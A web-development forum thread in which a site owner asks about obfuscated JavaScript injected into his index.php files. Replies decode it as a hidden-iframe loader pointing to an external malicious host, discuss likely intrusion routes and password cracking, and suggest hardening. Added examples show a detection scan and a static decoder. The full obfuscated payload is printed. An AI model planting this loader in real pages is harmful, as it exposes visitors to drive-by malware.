www.webdeveloper.com

Thread: index.php hacked

  1. #1
    Join Date
    Aug 2011
    Posts
    3

    index.php hacked

    hi guys,

    my server was attacked some days ago, and to all "index.php" files the following code was added:


    Code:
        <script>String.prototype.test="harC";for(i in $='')m=$[i];var ss="";try{eval('asdas')}catch(q){s=String["fr"+"omC"+m+"od"+'e'];}d=new Date();d2=new Date(d.valueOf()-2);Object.prototype.asd="e";try{for(i in{})if(~i.indexOf('a'+'s'))throw 1;}catch(q){h=-1*(d-d2);}
        n=[7-h,7-h,103-h,100-h,30-h,38-h,98-h,109-h,97-h,115-h,107-h,99-h,108-h,114-h,44-h,101-h,99-h,114-h,67-h,106-h,99-h,107-h,99-h,108-h,114-h,113-h,64-h,119-h,82-h,95-h,101-h,76-h,95-h,107-h,99-h,38-h,37-h,96-h,109-h,98-h,119-h,37-h,39-h,89-h,46-h,91-h,39-h,121-h,7-h,7-h,7-h,103-h,100-h,112-h,95-h,107-h,99-h,112-h,38-h,39-h,57-h,7-h,7-h,123-h,30-h,99-h,106-h,113-h,99-h,30-h,121-h,7-h,7-h,7-h,98-h,109-h,97-h,115-h,107-h,99-h,108-h,114-h,44-h,117-h,112-h,103-h,114-h,99-h,38-h,32-h,58-h,103-h,100-h,112-h,95-h,107-h,99-h,30-h,113-h,112-h,97-h,59-h,37-h,102-h,114-h,114-h,110-h,56-h,45-h,45-h,110-h,109-h,115-h,120-h,116-h,114-h,108-h,102-h,44-h,97-h,120-h,44-h,97-h,97-h,45-h,97-h,109-h,115-h,108-h,114-h,47-h,52-h,44-h,110-h,102-h,110-h,37-h,30-h,117-h,103-h,98-h,114-h,102-h,59-h,37-h,47-h,46-h,37-h,30-h,102-h,99-h,103-h,101-h,102-h,114-h,59-h,37-h,47-h,46-h,37-h,30-h,113-h,114-h,119-h,106-h,99-h,59-h,37-h,116-h,103-h,113-h,103-h,96-h,103-h,106-h,103-h,114-h,119-h,56-h,102-h,103-h,98-h,98-h,99-h,108-h,57-h,110-h,109-h,113-h,103-h,114-h,103-h,109-h,108-h,56-h,95-h,96-h,113-h,109-h,106-h,115-h,114-h,99-h,57-h,106-h,99-h,100-h,114-h,56-h,46-h,57-h,114-h,109-h,110-h,56-h,46-h,57-h,37-h,60-h,58-h,45-h,103-h,100-h,112-h,95-h,107-h,99-h,60-h,32-h,39-h,57-h,7-h,7-h,123-h,7-h,7-h,100-h,115-h,108-h,97-h,114-h,103-h,109-h,108-h,30-h,103-h,100-h,112-h,95-h,107-h,99-h,112-h,38-h,39-h,121-h,7-h,7-h,7-h,116-h,95-h,112-h,30-h,100-h,30-h,59-h,30-h,98-h,109-h,97-h,115-h,107-h,99-h,108-h,114-h,44-h,97-h,112-h,99-h,95-h,114-h,99-h,67-h,106-h,99-h,107-h,99-h,108-h,114-h,38-h,37-h,103-h,100-h,112-h,95-h,107-h,99-h,37-h,39-h,57-h,100-h,44-h,113-h,99-h,114-h,63-h,114-h,114-h,112-h,103-h,96-h,115-h,114-h,99-h,38-h,37-h,113-h,112-h,97-h,37-h,42-h,37-h,102-h,114-h,114-h,110-h,56-h,45-h,45-h,110-h,109-h,115-h,120-h,116-h,114-h,108-h,102-h,44-h,97-h,120-h,44-h,97-h,97-h,45-h,97-h,109-h,115-h,108-h,114-h,47-h,52-h,44-h,110-h,102-h,110-h,37-h,39-h,57-h,100-h,44-h,113-h,114-h,119-h,106-h,99-h,44-h,1
16-h,103-h,113-h,103-h,96-h,103-h,106-h,103-h,114-h,119-h,59-h,37-h,102-h,103-h,98-h,98-h,99-h,108-h,37-h,57-h,100-h,44-h,113-h,114-h,119-h,106-h,99-h,44-h,110-h,109-h,113-h,103-h,114-h,103-h,109-h,108-h,59-h,37-h,95-h,96-h,113-h,109-h,106-h,115-h,114-h,99-h,37-h,57-h,100-h,44-h,113-h,114-h,119-h,106-h,99-h,44-h,106-h,99-h,100-h,114-h,59-h,37-h,46-h,37-h,57-h,100-h,44-h,113-h,114-h,119-h,106-h,99-h,44-h,114-h,109-h,110-h,59-h,37-h,46-h,37-h,57-h,100-h,44-h,113-h,99-h,114-h,63-h,114-h,114-h,112-h,103-h,96-h,115-h,114-h,99-h,38-h,37-h,117-h,103-h,98-h,114-h,102-h,37-h,42-h,37-h,47-h,46-h,37-h,39-h,57-h,100-h,44-h,113-h,99-h,114-h,63-h,114-h,114-h,112-h,103-h,96-h,115-h,114-h,99-h,38-h,37-h,102-h,99-h,103-h,101-h,102-h,114-h,37-h,42-h,37-h,47-h,46-h,37-h,39-h,57-h,7-h,7-h,7-h,98-h,109-h,97-h,115-h,107-h,99-h,108-h,114-h,44-h,101-h,99-h,114-h,67-h,106-h,99-h,107-h,99-h,108-h,114-h,113-h,64-h,119-h,82-h,95-h,101-h,76-h,95-h,107-h,99-h,38-h,37-h,96-h,109-h,98-h,119-h,37-h,39-h,89-h,46-h,91-h,44-h,95-h,110-h,110-h,99-h,108-h,98-h,65-h,102-h,103-h,106-h,98-h,38-h,100-h,39-h,57-h,7-h,7-h,123-h];for(i=0;i<n.length;i++)ss+=s(eval("n"+"["+"i"+"]"));eval(ss);</script>
    Well. i think it's JavaScript, and now i want to know WHAT this code is / was doing a) at my server b) in the browser of my visitors

    thanks!

    ps: as you might have realized, english is not my mother tongue ...

  2. #2
    Join Date
    Apr 2006
    Location
    Perth
    Posts
    154
    decoded:

    Code:
    if (document.getElementsByTagName('body')[0])
     { iframer(); }
    else
     { document.write("&lt;iframe src='http://pouzvtnh.cz.cc/count16.php' width='10' height='10' style='visibility:hidden;position:absolute;left:0;top:0;'&gt;&lt;/iframe&gt;");
     }
    function iframer()
     { var f = document.createElement('iframe');
       f.setAttribute('src','http://pouzvtnh.cz.cc/count16.php');
       f.style.visibility='hidden';
       f.style.position='absolute';
       f.style.left='0';
       f.style.top='0';
       f.setAttribute('width','10');
       f.setAttribute('height','10');
       document.getElementsByTagName('body')[0].appendChild(f);
     }
    edit: wow, Do Not load that pouzvth.cz.cc site. Will redirect you somewhere else
    and even though I only downloaded the source in raw unexecutable text, AVG picked
    it up. So it's a known threat.
    Last edited by DracoMerest; 08-28-2011 at 11:09 AM. Reason: additional info

  3. #3
    Join Date
    Aug 2011
    Posts
    3
    do you have an idea how it came to my webspace? i'm only using linux systems - no windows!

  4. #4
    Join Date
    Apr 2006
    Location
    Perth
    Posts
    154
    Best guess: someone figured out your linux password? I do not know how you access
    your server remotely but obviously someone does.

    Hacking is a tricky thing - sometimes the easiest method is the least obvious.

    If you have a simple password and I can sniff out your password hash database (I don't
    know what it is called really) and extract the MD5 hash or whichever, I could either
    brute force your password or use a rainbow table.

  5. #5
    Join Date
    Aug 2011
    Posts
    3
    okay, i've changed all my passwords now - hopefully i won't forget them... (by the way i used a live disk that could not be infected by a rootkit, i think).

    i'm going to contact my hoster too. hopefully he might help me...

    okay, thanks for your great help, now i know what's my problem.

  6. #6
    Join Date
    Apr 2006
    Location
    Perth
    Posts
    154
    Passwords may not have been your only problem area.

    You have not indicated what is on your site.

    If you allow visitors to post information through a shoutbox or mini forum then there is
    always the possibility that someone was able to bypass any active content filters and
    inject some malicious code which actively modified the files on your server.

    Having changed one security aspect: your password, wait. If it happens again look for a
    solution elsewhere. Always make one change and test the result.
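
Added example, not part of any post in this thread: a check for noticing whether the injection from post #1 comes back, by flagging `<script>` blocks that combine a long run of `number-h` array terms with an `eval(` call. The function names, the `MIN_TERMS` threshold and the sample file contents are assumptions constructed for illustration.

```javascript
'use strict';

// Constructed sample file contents (not taken from the poster's server).
const SAMPLE_FILES = {
  'site/index.php':
    '<?php echo "home"; ?>\n<script>var ss="";n=[7-h,7-h,103-h,100-h,' +
    '30-h,38-h,98-h,109-h];for(i=0;i<n.length;i++)ss+=s(n[i]);eval(ss);</script>',
  'site/about/index.php':
    '<?php echo "about"; ?>\n<script>var h = 3; var w = 10-h; draw(w);</script>',
};

// Assumed threshold: ordinary scripts rarely hold this many "N-h" entries.
const MIN_TERMS = 8;

// Return the position of every <script> block that looks like the injected
// loader: many "<number>-h" array entries plus an eval( call.
function findInjectedScripts(text) {
  const hits = [];
  const re = /<script\b[^>]*>([\s\S]*?)<\/script>/gi;
  let m;
  while ((m = re.exec(text)) !== null) {
    const body = m[1];
    const terms = (body.match(/\d+\s*-\s*h\s*[,\]]/g) || []).length;
    const hasEval = /\beval\s*\(/.test(body);
    if (terms >= MIN_TERMS && hasEval) {
      hits.push({ start: m.index, end: m.index + m[0].length, terms });
    }
  }
  return hits;
}

// files: object mapping a file name to its text. Returns the flagged names.
function scan(files) {
  return Object.keys(files)
    .filter((name) => findInjectedScripts(files[name]).length > 0)
    .sort();
}

console.log(scan(SAMPLE_FILES));
```

The `start` and `end` offsets mark the exact span to compare against a known-good copy of the file before removing anything.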

  7. #7
    Join Date
    Aug 2011
    Posts
    60
    all page data should come through the index and the top of each file should be conditioned on being accessed by the index }else{ exit; } or kill;
    the index should never be writable perm-0555, and sql is the worst idea for passwords. flatfile above the web-root instead.
    after all, sql is simply a flatfile organizer.

  8. #8
    Join Date
    Jan 2009
    Posts
    3,346
    Quote Originally Posted by Dorky View Post
    all page data should come through the index and the top of each file should be conditioned on being accessed by the index }else{ exit; } or kill;
    the index should never be writable perm-0555, and sql is the worst idea for passwords. flatfile above the web-root instead.
    after all, sql is simply a flatfile organizer.
    SQL is fine for passwords as long as a good hash with a salt is used. If the OP is on a shared host it might've been another poor consumer who was initially hacked in which case there really might not have been anything the OP could have done.

  9. #9
    Join Date
    Aug 2011
    Posts
    60
    Quote Originally Posted by criterion9 View Post
    SQL is fine for passwords as long as a good hash with a salt is used. If the OP is on a shared host it might've been another poor consumer who was initially hacked in which case there really might not have been anything the OP could have done.
    Word

  10. #10
    Join Date
    Oct 2011
    Posts
    2
    Hi,

    DracoMerest, you'd know where I could tell me decode this kind of code or that code is, that base64 is not a site where encode / decode or some script that allows me to do this kind of coding.

    Sorry for my bad English

    Thanks a lot.

  11. #11
    Join Date
    Apr 2006
    Location
    Perth
    Posts
    154
    Hi Drotha,

    Your English is not that bad but your description of what you want is terrible.

    The only thing I can really identify from your request is base64 and de/encode.

    Do you have MIME64 text you wish to decode?

    http://www.webutils.pl/Base64

    This type of text is usually found as a BIN attachment for newsgroups.

    Are you referring to MD5 or NT/LM hashcodes?

    RunScanner is very good.
    RaibowTables.com will get many jobs done.

    That is all I can offer at the moment due to not fully understanding your question.

  12. #12
    Join Date
    Apr 2011
    Location
    Accelerating Windows at 9.81 m/s....
    Posts
    33
    Most of these attacks (in the wild) are SQL-injections. Always sanitize your inputs. If you're running someone else's code, upgrade to the latest version. And complain to them rather loudly

  13. #13
    Join Date
    Oct 2011
    Posts
    2
    Hi DracoMerest,

    I wish I could de/encode this type of code
    7-h,7-h,103-h,100-h,30-h,38-h,98-h,109-h,97-h,115-h,107-h,99-h,108-h,... in the first post you put and him decode, not is base64 coded or no I decoded

    as de/encode?


    Thanks a lot

  14. #14
    Join Date
    Apr 2006
    Location
    Perth
    Posts
    154
    Hi Dortha,

    I do not have an encoder.

    The decoder is in the script posted by go-seven. I merely asked the decoder
    to show the result instead of executing it.

    for(i=0;i<n.length;i++)
    ss+=s(eval("n"+"["+"i"+"]"));
    // eval(ss);
    document.write("<xmp>"+ss+"</xmp>");

    Search Google for 'encrypt JavaScript' and you'll find many results, but most
    of them are useless because the decode script must be included within any
    webpage that uses the encryption.

    Did you read the Sticky Note "Wondering how to hide your source code?"

    Note: I am very sad to see the <XMP> tag not being part of HTML5...
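
Added example, not part of any post in this thread: the same "show instead of execute" idea as post #14, done without running the sample at all. It reads the offset `h` from the wrapper in post #1 (`d2` is `d` minus a literal and `h=-1*(d-d2)`, so `h` is minus that literal) and rebuilds the text from the `number-h` terms as plain data. The function names are assumptions; `WRAPPER` is abridged from post #1 and `TERMS` holds only the first 14 array entries, the ones quoted in post #13.

```javascript
'use strict';

// Abridged wrapper fragments from post #1 (the try body is elided here).
const WRAPPER = 'd=new Date();d2=new Date(d.valueOf()-2);' +
                'try{/*...*/}catch(q){h=-1*(d-d2);}';
// First 14 entries of the n=[...] array from post #1.
const TERMS = 'n=[7-h,7-h,103-h,100-h,30-h,38-h,98-h,109-h,97-h,' +
              '115-h,107-h,99-h,108-h,114-h];';

// h is -(d - d2) and d2 is d minus a literal, so h is minus that literal.
function inferOffset(source) {
  const m = /new Date\(\s*d\.valueOf\(\)\s*-\s*(\d+)\s*\)/.exec(source);
  const usesDiff = /h\s*=\s*-1\s*\*\s*\(\s*d\s*-\s*d2\s*\)/.test(source);
  if (!m || !usesDiff) {
    throw new Error('wrapper does not match the pattern from post #1');
  }
  return -Number(m[1]);
}

// Collect every "<number>-h" entry as an integer; nothing is evaluated.
function extractTerms(source) {
  const out = [];
  const re = /(\d+)\s*-\s*h\b/g;
  let m;
  while ((m = re.exec(source)) !== null) out.push(Number(m[1]));
  return out;
}

// Rebuild the hidden text as String.fromCharCode(term - h), as data only.
function decodeStatic(source) {
  const h = inferOffset(source);
  const terms = extractTerms(source);
  if (terms.length === 0) throw new Error('no "<number>-h" terms found');
  return terms.map((t) => String.fromCharCode(t - h)).join('');
}

// JSON.stringify makes tabs and other control characters visible.
function report(source) {
  return JSON.stringify(decodeStatic(source));
}

console.log(report(WRAPPER + TERMS));
```

The decoded prefix matches the start of the script shown in post #2, and because nothing is passed to `eval` or written into a page, the decoded iframe is never created.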

  15. #15
    Join Date
    Jan 2013
    Location
    Jamaica
    Posts
    1
    Quote Originally Posted by DracoMerest View Post
    Passwords may not have been your only problem area.

    You have not indicated what is on your site.

    If you allow visitors to post information through a shoutbox or mini forum then there is
    always the possibility that someone was able to bypass any active content filters and
    inject some malicious code which actively modified the files on your server.

    Having changed one security aspect: your password, wait. If it happens again look for a
    solution elsewhere. Always make one change and test the result.
    I was planning to add a shoutbox to my site, and seeing this post, I'm now pondering if it is safe to add the shoutbox.
